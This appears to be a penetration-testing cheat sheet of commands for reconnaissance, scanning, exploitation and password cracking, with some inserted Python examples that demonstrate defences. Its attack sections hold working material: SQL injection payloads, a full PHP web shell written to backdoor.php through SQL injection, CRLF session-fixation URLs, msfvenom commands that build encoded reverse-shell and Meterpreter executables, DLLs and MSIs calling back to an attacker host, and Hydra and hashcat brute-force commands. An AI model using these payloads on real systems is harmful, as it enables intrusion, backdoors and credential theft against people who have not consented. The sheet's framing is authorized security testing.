ivan-sincek / Penetration Testing Cheat Sheet

Licence: mit
Work in progress...

Penetration Testing Cheat Sheet

This is more of a checklist for myself. May contain useful tips and tricks.

Everything was tested on Kali Linux v2020.3 (64-bit).

For help with any of the tools write <tool_name> -h | -hh | --help or man <tool_name>.

Sometimes -h can be mistaken for a host or some other option. If that's the case, use -hh or --help instead, or read the manual with man.

Some of these tools do similar tasks, but get slightly different results - run everything you can.

Keep in mind that when neither a protocol nor a port number is specified in a URL, i.e. somesite.com, some tools might default to HTTP and port 80.

If you didn't already, read the OWASP Testing Guide v4.

Websites that you should use when writing the report:

If you are interested, check my WiFi penetration testing cheat sheet.

Table of Contents

1. Reconnaissance

2. Scanning/Enumeration

3. Gaining Access

4. Password Cracking

5. Social Engineering

6. Miscellaneous

1. Reconnaissance

Keep in mind that some web applications are only accessible through older web browsers like Internet Explorer.

Keep in mind that some web applications may be missing the index page and may not redirect you to the home page at all. If that's the case, try to manually guess a full path to the home page or use DirBuster.

Search the Internet for default paths and files for a specific web application, and possibly use the information gathered in combination with Google Dorks.

Don't forget to access a web server over its IP address, because you may find the server's default welcome page and some other content.

Inspect the Web Console for possible errors.

Inspect the source code for possible errors and comments.

Optionally, check Recon-ng. Nice tool, but too big to explain.

1.1 Useful Websites

whois.domaintools.com

spyse.com

lookup.icann.org

www.shodan.io

sitereport.netcraft.com

pgp.circl.lu

www.exploit-db.com/google-hacking-database

pentest-tools.com/information-gathering/google-hacking

Dmitry

Gather information about a specified domain:

dmitry -winseo dmitry_results.txt somedomain.com

Use this one-liner to extract hostnames from the results:

grep -P -o "(?<=HostName\:)[^\s]+" dmitry_results.txt | sort -u

For more options run man dmitry or dmitry -h.

theHarvester

Gather information about a specified domain:

theHarvester -d somedomain.com -l 500 -b google,bing,yahoo,linkedin -f theHarvester_results.xml

Sometimes the output file might default to the /usr/lib/python3/dist-packages/theHarvester directory.

Use this one-liner to extract hostnames from the results:

grep -P -o "(?<=\<hostname\>)[^\s]+?(?=\<\/hostname\>)" theHarvester_results.xml | sort -u

For more options run theHarvester -h.

FOCA (Fingerprinting Organizations with Collected Archives)

Find metadata and hidden information in files.

Tested on Windows 10 Enterprise OS (64-bit).

Setup:

The GUI is very intuitive.

Metagoofil

Search and download specific or all files through Google Dorks:

metagoofil -d somedomain.com -l 100 -n 100 -t pdf -w -o metagoofil_results

Use this one-liner to extract authors from PDFs:

for file in metagoofil_results/*; do pdfinfo "$file"; done | grep -P -o "(?<=Author\:).+" | sed 's/[[:space:]]//g' | sort -u

For more options run metagoofil -h.

Fierce

Interrogate a domain name server:

fierce -dns somedomain.com -file fierce_std_results.txt

fierce -dns somedomain.com -wordlist dnsmap.txt -file fierce_brt_results.txt

By default, Fierce performs a brute force attack with its built-in wordlist.

You can find dnsmap.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/dnsmap.zip.

For more options run fierce -h.

dig

Interrogate a domain name server:

dig somedomain.com ANY +noall +answer

Interrogate a specific domain name server:

dig @192.168.8.5 somedomain.com ANY +noall +answer

Reverse DNS lookup:

dig -x 192.168.8.5 +noall +answer

For more options run man dig or dig -h.

DNSRecon

Interrogate a domain name server:

dnsrecon -d somedomain.com -t std --json /root/Desktop/dnsrecon_std_results.json

dnsrecon -d somedomain.com -t axfr --json /root/Desktop/dnsrecon_axfr_results.json

dnsrecon -d somedomain.com -t brt -D /usr/share/wordlists/dnsmap.txt --json /root/Desktop/dnsrecon_brt_results.json

Use this one-liner to extract hostnames from the zone transfer results:

grep -P -o "(?<=\"name\"\:\ \"|\"mname\"\:\ \"|\"target\"\:\ \"|\"exchange\"\:\ \"|\"replacement\"\:\ \")[^\s\"]+" dnsrecon_axfr_results.json | sort -u

DNSRecon can perform brute force attack with a user-defined wordlist, but make sure you specify a full path to the wordlist; otherwise, DNSRecon might not recognize it.

Also, make sure you specify a full path to an output file; otherwise, it will default to the /usr/share/dnsrecon/ directory.

You can find dnsmap.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/dnsmap.zip.

Reverse DNS lookup:

dnsrecon -s -r 192.168.8.0/24 --json /root/Desktop/dnsrecon_reverse_results.json

Use this one-liner to extract hostnames from the reverse DNS lookup results:

grep -P -o "(?<=\"name\"\:\ \")[^\s\"]+" dnsrecon_reverse_results.json | sort -u

For more options run man dnsrecon or dnsrecon -h.

Sublist3r

Installation:

apt-get update && apt-get install sublist3r

Enumerate subdomains using OSINT:

sublist3r -d somedomain.com -o sublist3r_results.txt

For more options run sublist3r -h.

WhatWeb

Identify a website:

whatweb -v somesite.com

For more options run man whatweb or whatweb -h.

DirBuster

Brute force directories and file names on a web server.

Don't forget that GNU/Linux file systems are case sensitive.

Don't forget to manually search for robots.txt as it may contain other file names and/or paths.

Don't forget to manually search for phpinfo.php as it may contain valuable information.

DirBuster might take a long time to finish depending on the settings and wordlist used.

Common Responses
200 OK
301 Moved Permanently
302 Found
401 Unauthorized
403 Forbidden
404 Not Found
500 Internal Server Error
503 Service Unavailable

Figure 1 - DirBuster

All DirBuster's wordlists are located at /usr/share/dirbuster/wordlists/ directory.

Parsero

Test all robots.txt entries:

parsero -u somesite.com -sb

For more options run parsero -h.

SecLists

Download a useful collection of multiple types of lists for security assessments.

Installation:

apt-get update && apt-get install seclists

Lists will be stored in /usr/share/seclists/.

Or, download the collection manually from here.

2. Scanning/Enumeration

Keep in mind that web applications can be hosted on other ports besides 80 (HTTP) and 443 (HTTPS), e.g. they can be hosted on port 8443 (HTTPS).

Keep in mind that on ports 80 (HTTP) and 443 (HTTPS) a web server can host different web applications or some other service entirely.

Don't forget to use Ncat and/or Telnet for banner grabbing.

Try to invest in Nessus Professional and Burp Suite Professional or any similar premium tools if you can afford them.

While scanning for vulnerabilities and/or doing any other intensive scans, periodically check the web application/service in case it crashed, so you can alert the client as soon as possible.

2.1 Useful Websites

www.calculator.net/ip-subnet-calculator.html

www.speedguide.net/ports.php

securityheaders.com

Nmap

Ping sweep (map live hosts):

nmap -sn 192.168.8.0/24 -oG nmap_ping_sweep_results.txt

nmap -sn 192.168.8.0/24 -oG - | grep -P -o "(?<=Host\:\ )[^\s]+" - > nmap_ping_sweep_results.txt

TCP scan (all ports):

nmap -nv -sS -sV -sC -Pn 192.168.8.0/24 -p- -oN nmap_tcp_results.txt

mkdir -p /nmap_tcp_results/

for ip in $(cat nmap_ping_sweep_results.txt); do nmap -nv -sS -sV -sC -Pn $ip -p- -oN /nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt; done

UDP scan (only important ports):

nmap -nv -sU -sV -sC -Pn 192.168.8.0/24 -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -oN nmap_udp_results.txt

mkdir -p /nmap_udp_results/

for ip in $(cat nmap_ping_sweep_results.txt); do nmap -nv -sU -sV -sC -Pn $ip -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -oN /nmap_udp_results/nmap_udp_results_${ip//./_}.txt; done

Option Description
-n/-R Never do DNS resolution/Always resolve (default: sometimes)
-v Increase verbosity level (use -vv or more for greater effect)
-Pn Treat all hosts as online -- skip host discovery
-A Enable OS detection, version detection, script scanning, and traceroute
-sS/sT/sA TCP SYN/Connect()/ACK
-sV Probe open ports to determine service/version info
-sn Ping scan - disable port scan
-p/-p- Only scan specified ports/Scan all ports
--top-ports Scan most common ports
--script Script scan (takes time to finish)
--script-args Provide arguments to scripts
--script-help Show help about scripts
-sC Same as --script=default
-O Enable OS detection
--reason Display the reason a port is in a particular state
-oN/-oX/-oG Output scan in normal, XML, and Grepable format

For more options run man nmap or nmap -h.

All Nmap's scripts are located at /usr/share/nmap/scripts/ directory. Read more about them here.

NSE examples:

nmap -nv -Pn 192.168.8.5 -p 3306 --script="mysql-brute" --script-args="userdb='users.txt', passdb='rockyou.txt'"

You can find rockyou.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/rockyou.zip.

Try to use IPs instead of domain names.

TO DO: Vulnerability scanning using NSE.

Nikto

Scan a web server:

nikto -h somesite.com -p 80 -output nikto_results.txt

For more options run man nikto or just nikto.

WPScan

Scan a WordPress website:

wpscan --url somesite.com -o wpscan_results.txt

For more options run man wpscan or wpscan -h.

testssl.sh

Setup:

git clone https://github.com/drwetter/testssl.sh
cd testssl.sh
chmod +x testssl.sh

Test an SSL/TLS certificate (i.e. SSL/TLS ciphers, protocols, etc.):

./testssl.sh somesite.com

For more options run ./testssl.sh -hh.

3. Gaining Access

Always try null session login (i.e. no password login) or search the Internet for default credentials for a specific web application.

Try to manipulate cookies to gain access or to elevate privileges.

Try to change an HTTP POST request into an HTTP GET request (i.e. into a query string) and see if the server will accept it.

Always remember to delete your backdoors and other artifacts when you are done!

TO DO: HTTP smuggling with smuggler.py.

TO DO: Social engineering with httrack and setoolkit.

3.1 Useful Websites

www.exploit-db.com

www.cvedetails.com

www.securityfocus.com/vulnerabilities

www.xssed.com

HTTP Response Splitting

Also known as CRLF Injection. CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n).

Fixate a session cookie:

somesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789

When encoded, \r refers to %0D and \n refers to %0A.
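Added example, not code from the cheat sheet: a minimal Python redirect handler that copies the origin parameter into the Location header, once without validation (the response is split exactly as the URL above does it) and once with the check that stops it. The function names and the parsed response are constructed for this illustration.

```python
"""HTTP response splitting: why the %0D%0A payload injects a header, and the fix.
Added example, not code from the cheat sheet."""
from urllib.parse import unquote

# Constructed input: the cheat sheet's session-fixation payload after the web
# server has URL-decoded the query string (%0D%0A becomes a real CRLF pair).
PAYLOAD = unquote("somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789")


def _render(origin: str) -> bytes:
    """Assemble the 302 response head by plain string concatenation."""
    head = (
        "HTTP/1.1 302 Found\r\n"
        "Location: http://" + origin + "\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return head.encode("latin-1")


def build_redirect_vulnerable(origin: str) -> bytes:
    """Vulnerable: the user-controlled value goes straight into a header line."""
    return _render(origin)


def build_redirect_safe(origin: str) -> bytes:
    """Hardened: refuse CR, LF and NUL in a header value before it is emitted.

    Rejecting (rather than silently stripping) keeps the attempt visible in the
    application log. A real handler should also validate the redirect target
    against an allow-list; that is the separate open-redirect problem.
    """
    if any(c in origin for c in "\r\n\x00"):
        raise ValueError("CR/LF/NUL in header value: possible response splitting")
    return _render(origin)


def parse_headers(raw: bytes) -> dict:
    """Parse the response head the way a browser does: one header per CRLF line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    _status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def safe_rejects(origin: str) -> bool:
    """True if the hardened builder refuses this origin value."""
    try:
        build_redirect_safe(origin)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The browser sees a Set-Cookie header the developer never wrote.
    print(parse_headers(build_redirect_vulnerable(PAYLOAD)))
    print("hardened handler rejects payload:", safe_rejects(PAYLOAD))
```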

Cross-Site Scripting

Find out more about reflected and stored XSS attacks from my other project.

SQL Injection

Try to produce database errors by injecting a single-quote, back-slash, double-hyphen, forward-slash, or period.

The following examples were tested on MySQL database.

Boolean-based SQLi:

' OR 1=1-- 

Note that MySQL requires a space between the comment symbol and the next character.

Union-based SQLi:

' UNION SELECT 1, 2, 3, 4-- 

' UNION SELECT 1, concat_ws(' | ', database(), current_user(), version()), 3, 4-- 

' UNION SELECT 1, concat_ws(' | ', table_schema, table_name, column_name, data_type, character_maximum_length), 3, 4 FROM information_schema.columns-- 

' UNION SELECT 1, load_file('..\\..\\apache\\conf\\httpd.conf'), 3, 4-- 

Use the union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather results.

The goal is to determine the exact number of columns in the application's query and to figure out which of them are displayed to the user.

Time-based SQLi:

' AND (SELECT 1 FROM (SELECT sleep(2)) test)-- 

' AND (SELECT 1 FROM (SELECT CASE current_user() WHEN 'root@localhost' THEN sleep(2) ELSE sleep(0) END) test)-- 

' AND (SELECT 1 FROM (SELECT CASE substring(current_user(), 1, 1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)-- 

' AND (SELECT CASE substring(password, 1, 1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM schema.users WHERE id = 1)-- 

Use the time-based SQLi when you are not able to see the results.

Inject a simple web shell:

' UNION SELECT '', '', '', '<?php $output="";if(isset($_SERVER["REQUEST_METHOD"])&&strtolower($_SERVER["REQUEST_METHOD"])==="post"&&isset($_POST["command"])&&strlen(trim($_POST["command"]))>0){$output=htmlentities(shell_exec("(".trim($_POST["command"]).") 2>&1"),ENT_QUOTES,"UTF-8");if(!$output){$output="ERROR: Cannot encode binary output, or no output received.";}} ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><form method="post" action="<?php echo "./".pathinfo($_SERVER["SCRIPT_FILENAME"],PATHINFO_BASENAME); ?>"><input name="command" type="text" placeholder="Enter Command" autofocus="autofocus"></form><pre><?php echo $output; ?></pre></body></html>' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- 

To successfully inject a web shell, the database user must have write permission on the file system.

Always make sure to properly close the surrounding code.
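Added example, not code from the cheat sheet: the single-quote error probe and the boolean-based bypass above, reproduced in Python against an in-memory SQLite table next to the parameterised query that stops them. SQLite stands in for MySQL because it runs offline; the table, rows and function names are constructed.

```python
"""Boolean-based SQLi from the cheat sheet, vulnerable and parameterised side by side.
Added example, not code from the cheat sheet. SQLite treats the single-quote
probe and ' OR 1=1--  the same way MySQL does for this purpose."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table. A real application stores password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "alice", "hunter2")],
    )
    return conn


DB = make_db()


def login_vulnerable(username: str, password: str, conn=DB):
    """Vulnerable: input is pasted into the SQL text, so quotes and -- become syntax."""
    query = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(username: str, password: str, conn=DB):
    """Hardened: bound parameters travel separately from the SQL text."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def triggers_db_error(username: str, password: str) -> bool:
    """True when the vulnerable query no longer parses: the error the page probes for."""
    try:
        login_vulnerable(username, password)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    bypass = "' OR 1=1-- "  # trailing space after the comment, as the cheat sheet notes
    print("single-quote probe raises DB error:", triggers_db_error("admin", "'"))  # True
    print("vulnerable login with bypass      :", login_vulnerable("admin", bypass))  # 1
    print("parameterised login with bypass   :", login_safe("admin", bypass))  # None
```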

sqlmap

Inject SQL code into request parameters:

sqlmap -a -u "somesite.com/index.php?username=test&password=test"

sqlmap -a -u somesite.com/index.php --data "username=test&password=test"

Option Description
-u Target URL
--data Data string to be sent through POST
--cookie HTTP Cookie header value
--proxy Use a proxy to connect to the target URL
--level Level of tests to perform (1-5, default: 1)
--risk Risk of tests to perform (1-3, default: 1)
-a Retrieve everything
-b Retrieve DBMS banner
--dump-all Dump all DBMS databases tables entries
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter, or VNC
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users

For more options run man sqlmap, sqlmap -h, or sqlmap -hh.

dotdotpwn

Traverse a path (e.g. somesite.com/../../etc/shadow):

dotdotpwn -m http -h somesite.com -f /etc/passwd -k "root"

dotdotpwn -m http -S -h somesite.com -f /windows/win.ini -k "mci"

dotdotpwn -m http-url -u https://somesite.com/index.php?file=TRAVERSAL -f /etc/hosts -k "localhost"

Option Description
-m Module (http, http-url, ftp, tftp, payload, stdout)
-h Hostname
-O Operating System detection for intelligent fuzzing (nmap)
-o Operating System type if known ("windows", "unix", or "generic")
-d Depth of traversals (default: 6)
-f Specific filename (default: according to OS detected)
-S Use SSL for HTTP and Payload module (not needed for http-url)
-u URL with the part to be fuzzed marked as TRAVERSAL
-k Text pattern to match in the response
-p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
-x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
-U Username (default: 'anonymous')
-P Password (default: 'dot@dot.pwn')
-M HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET)
-b Break after the first vulnerability is found
-C Continue if no data was received from host

For more options simply run dotdotpwn.

Wapiti

Scan a web application for vulnerabilities:

wapiti -v 2 --color -u https://somesite.com/ --scope domain -o wapiti_results -f html

wapiti -v 2 --color -u https://www.somesite.com/ --scope url -a username%password --auth-type basic -o wapiti_results -f html

wapiti-getcookie -u https://somesite.com/app/login.php -c cookies.json

wapiti -v 2 --color -u https://somesite.com/app/ --scope folder -c cookies.json -x https://somesite.com/app/logout.php -o wapiti_results -f html

Option Description
-u The base URL used to define the scan scope
--scope Set scan scope (page, folder, domain, url, punk, default: folder)
-m List of modules to load
--list-modules List attack modules and exit
-a Set HTTP authentication credentials (username%password)
--auth-type Set the authentication type to use (basic, digest, kerberos, ntlm)
-c Set a JSON cookie file to use
-d Set how deep the scanner should explore the website
-t Set timeout for requests
-f Set output format (json, html, txt, openvas, vulneranet, xml, default: html)
-o Output file or folder
--flush-attacks Flush attack history and vulnerabilities for the current session
--flush-session Flush everything that was previously found for this target

For more options run man wapiti, wapiti -h, or wapiti -hh.

Modules (default): blindsql, sql, exec, file, redirect, ssrf, xss, permanentxss

Modules (optional): backup, buster, crlf, delay, htaccess, methods, nikto, shellshock, xxe

PHP Reverse Shell

Find out more about PHP reverse TCP shell from my other project.

Generate a Reverse Shell Payload for Python

Find out how to generate a reverse shell payload for Python and send it to a target machine from my other project.

Generate a Reverse Shell Payload for Windows OS

To generate a Base64 encoded payload use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b '\x00\x0a\x0d\xff' | base64 -w 0 > payload.txt

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b '\x00\x0a\x0d\xff' | base64 -w 0 > payload.txt

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 > payload.txt

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 > payload.txt

To generate a binary file use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b '\x00\x0a\x0d\xff' -o payload.bin

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b '\x00\x0a\x0d\xff' -o payload.bin

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin

To generate a DLL file use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f dll -b '\x00\x0a\x0d\xff' -o payload.dll

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f dll -b '\x00\x0a\x0d\xff' -o payload.dll

To generate a standalone executable file use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f exe -b '\x00\x0a\x0d\xff' -o payload.exe

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f exe -b '\x00\x0a\x0d\xff' -o payload.exe

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe

To generate an MSI file use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f msi -b '\x00\x0a\x0d\xff' -o payload.msi

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f msi -b '\x00\x0a\x0d\xff' -o payload.msi

Bytecode might not work on the first try due to some other bad characters. Trial and error is the key.

So far there is no easy way to generate a DLL or MSI file with a stageless Meterpreter shell due to size issues.

4. Password Cracking

Google a hash before trying to crack it because you might save yourself a lot of time and trouble.

Use Google Dorks (or FOCA) to find files whose metadata contains a domain username to brute force.

Keep in mind that you might lock out people's accounts.

Keep in mind that some web forms implement CAPTCHA and/or hidden submission tokens which may prevent you from brute forcing.

You can find a bunch of wordlists located at /usr/share/seclists/ directory.

Also, check the simple one-time-password lists in /dict/otp.zip.

TO DO: Pre-shared key cracking with ike-scan and psk-crack.

4.1 Useful Websites

gchq.github.io/CyberChef

www.onlinehashcrack.com

hashkiller.io/listmanager

crackstation.net

weakpass.com/wordlist

crunch

Generate a lower-alpha-numeric wordlist:

crunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt

You can see the list of all available charsets or add your own in charset.lst located at /usr/share/crunch/ directory.

Generate all the possible permutations for specified words:

crunch -o crunch_wordlist.txt -p admin 123 \!\"

crunch -o crunch_wordlist.txt -q words.txt

Generate all the possible combinations for a specified charset:

crunch 4 6 -o crunch_wordlist.txt -p admin123\!\"

Option Description
-d Limits the number of consecutive characters
-f Specifies a character set from a file
-i Inverts the output
-l When you use the -t option this option tells crunch which symbols should be treated as literals
-o Specifies the file to write the output to
-p Tells crunch to generate/permute words that don't have repeating characters
-q Tells crunch to read a file and permute what is read
-r Tells crunch to resume generating words from where it left off; -r only works if you use -o
-s Specifies a starting string
-t Specifies a pattern

For more options run man crunch or crunch -h.

Placeholder Description
@ Lower case characters
, Upper case characters
% Numbers
^ Symbols

Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.

Generate all the possible combinations for a specified placeholder:

crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^

crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^

crunch 10 10 + + 123456 \!\" -o crunch_wordlist.txt -t admin@@%^^

crunch 10 10 -o crunch_wordlist.txt -t @admin@%^^ -l @aaaaaaaaa

hash-identifier

To identify a hash type, run the following tool:

hash-identifier

Hashcat

Brute force MD5 hashes:

hashcat -m 0 -a 3 --session=cracking --force --status --optimized-kernel-enable --outfile hashcat_results.txt hashes.txt

Brute force NetNTLMv1 hashes:

hashcat -m 5500 -a 3 --session=cracking --force --status --optimized-kernel-enable --outfile hashcat_results.txt hashes.txt

Use --session=<session_name> so that you can continue your cracking progress later on with --restore.

Continue cracking progress:

hashcat --session=cracking --restore

Option Description
-m Hash-type, see references below
-a Attack-mode, see references below
--force Ignore warnings
--status Enable automatic update of the status screen
--session Define specific session name
--runtime Abort session after X seconds of runtime
--restore Restore session from --session
--restore-file-path Specific path to restore file
--outfile Define outfile for recovered hash
--show Show cracked passwords found in potfile
--optimized-kernel-enable Enable optimized kernels (limits password length)
-1 User-defined charset ?1
-2 User-defined charset ?2
-3 User-defined charset ?3
-4 User-defined charset ?4

For more options run man hashcat or hashcat -h.

When specifying a user-defined charset, escape ? with another ? (i.e. use ?? instead of \?).

Hash Type Description
0 MD5
100 SHA1
1400 SHA256
1700 SHA512
200 MySQL323
300 MySQL4.1/MySQL5
1000 NTLM
5500 NetNTLMv1-VANILLA / NetNTLMv1-ESS
5600 NetNTLMv2
2500 WPA/WPA2
16800 WPA-PMKID-PBKDF2

For more hash types read the manual.

Attack Mode Name
0 Straight
1 Combination
2 Toggle Case
3 Brute Force
4 Permutation
5 Table Lookup
8 Prince

Charset Description
?l abcdefghijklmnopqrstuvwxyz
?u ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d 0123456789
?s !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a ?l?u?d?s
?b 0x00 - 0xff

Dictionary attack:

hashcat -m 100 -a 0 --session=cracking --force --status --optimized-kernel-enable B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt

hashcat -m 5600 -a 0 --session=cracking --force --status --optimized-kernel-enable --outfile hashcat_results.txt hashes.txt rockyou.txt

You can find rockyou.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/rockyou.zip.

Brute force a hash with a specified placeholder:

hashcat -m 0 -a 3 --session=cracking --force --status --optimized-kernel-enable cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2

hashcat -m 0 -a 3 --session=cracking --force --status --optimized-kernel-enable 85fb9a30572c42b19f36d215722e1780 -1 \!\"\#\$\%\&\/\(\)\=??\* -2 ?d?1 ?u?l?l?l?l?2?2?2
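Added example, not hashcat's own code: a Python mask parser that computes the keyspace of a hashcat mask, including the -1 to -4 user-defined charsets (which may reference each other, as ?d?1 does above) and the ?? literal, so you can judge how far a password policy holds up before running anything. The ?s charset follows hashcat's definition (33 characters, starting with a space), one more than the table above lists; the de-duplication of custom charsets is an assumption noted in the code.

```python
"""Keyspace of a hashcat mask with custom charsets. Added example, not hashcat's code."""
import math

BUILTIN = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    # hashcat's ?s starts with a space: 33 characters in total.
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "b": "".join(map(chr, range(256))),
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def _tokens(spec):
    """Yield ('lit', ch) or ('set', key) for a mask or charset spec; ?? is a literal ?."""
    i = 0
    while i < len(spec):
        if spec[i] != "?":
            yield ("lit", spec[i])
            i += 1
            continue
        if i + 1 >= len(spec):
            raise ValueError(f"dangling '?' at end of {spec!r}")
        nxt = spec[i + 1]
        yield ("lit", "?") if nxt == "?" else ("set", nxt)
        i += 2


def _lookup(key, custom):
    if key in BUILTIN:
        return BUILTIN[key]
    if key in custom:
        return custom[key]
    raise ValueError(f"unknown charset ?{key}")


def expand_charset(spec, custom=None):
    """Expand a -1..-4 definition such as '?d?s' to its distinct characters.

    Duplicates are dropped so the size counts distinct candidates (assumption:
    hashcat de-duplicates custom charsets the same way).
    """
    chars = []
    for kind, val in _tokens(spec):
        chars.extend(val if kind == "lit" else _lookup(val, custom or {}))
    return "".join(dict.fromkeys(chars))


def resolve_custom(defs):
    """defs maps '1'..'4' to the -1..-4 specs; later sets may use earlier ones."""
    resolved = {}
    for key in sorted(defs):
        resolved[key] = expand_charset(defs[key], resolved)
    return resolved


def mask_charsets(mask, custom=None):
    """One candidate charset per mask position (a literal is a one-character set)."""
    return [val if kind == "lit" else _lookup(val, custom or {})
            for kind, val in _tokens(mask)]


def mask_keyspace(mask, defs=None):
    """Number of candidates the mask generates: product of per-position set sizes."""
    custom = resolve_custom(defs or {})
    return math.prod(len(cs) for cs in mask_charsets(mask, custom))


def seconds_to_exhaust(keyspace, hashes_per_second):
    """Worst-case time to try every candidate at a given cracking speed."""
    return keyspace / hashes_per_second


if __name__ == "__main__":
    # The two brute-force commands above, after the shell has removed the backslashes.
    first = mask_keyspace("?1?l?l?l?l?l?2?2", {"1": "?l?u", "2": "?d?s"})
    second = mask_keyspace("?u?l?l?l?l?2?2?2", {"1": '!"#$%&/()=??*', "2": "?d?1"})
    for label, ks in (("first mask", first), ("second mask", second)):
        hours = seconds_to_exhaust(ks, 10_000_000_000) / 3600
        print(f"{label}: {ks:,} candidates, {hours:.1f} h at 10 GH/s")
```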

Hydra

Crack an HTTP POST web form login:

hydra -l admin -P rockyou.txt somesite.com http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed!" -o hydra_results.txt

When cracking a web form login, you must specify Login=Login:<expected_message> to distinguish between a successful login and a failed one. The expected message varies between web forms.

Keep in mind that the username and password request parameters can be named differently.

Crack a Secure Shell login:

hydra -L users.txt -P rockyou.txt 192.168.8.5 ssh -o hydra_results.txt

You can find rockyou.txt wordlist located at /usr/share/wordlists/ directory or download it from /dict/rockyou.zip.

Also, check the one-time-password lists in /dict/otp.zip.

Option Description
-R Restore a previous aborted/crashed session
-S Perform an SSL connect
-s If the service is on a different default port, define it here
